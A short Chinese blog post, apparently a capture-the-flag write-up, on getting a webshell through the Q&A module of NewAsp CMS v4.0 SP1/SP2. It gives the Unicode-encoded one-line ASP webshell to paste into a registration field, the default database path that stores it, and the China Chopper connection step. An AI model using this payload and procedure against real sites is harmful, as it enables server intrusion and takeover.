版权声明:原创 多崎巡礼,未经许可禁止转载! https://blog.csdn.net/qq_42357070/article/details/83507188
新云网站内容管理系统是一套开源的WEB网站管理系统,采用目前非常成熟的ASP+Access/SQL开发而成。使用它,我们可以很方便的管理自己的网站,目前新云网站内容管理系统最新的版本是v4.0.0 SP2。本文要介绍的捕洞就出在新云网站内容管理系统v4.0.0 SP1以及未打官方最新补丁的v4.0.O SP2的问吧系统中。
新云的问吧是类似百度知道的互动知识问答分享平台,问吧采用自己的数据库,数据库文件为.asa格式,由于过滤不严,导致可以向数据库中插入一句话木马,从而拿到webshell。
题目给出提示得到
自然,注册账户
但“密码问题”需要特别注意,要填写 ┼攠數畣整爠煥敵瑳∨≡┩愾
也就是<% execute request("a")%>a经过Unicode转码后的代码。
注册信息全部填写完毕后点“立即注册”按钮,注册成功后我们的一句话木马就插入到数据库中了
问吧数据库的默认地址是问吧耳录下的data目录下的ask_newasp.asa,直接在浏览器中访问,看到了数据库的代码,拉到网页最下面,看到了熟悉的“类型不匹配:'execute'”,说明一句话木马已经成功的插入到数据库中了。
菜刀连接
Done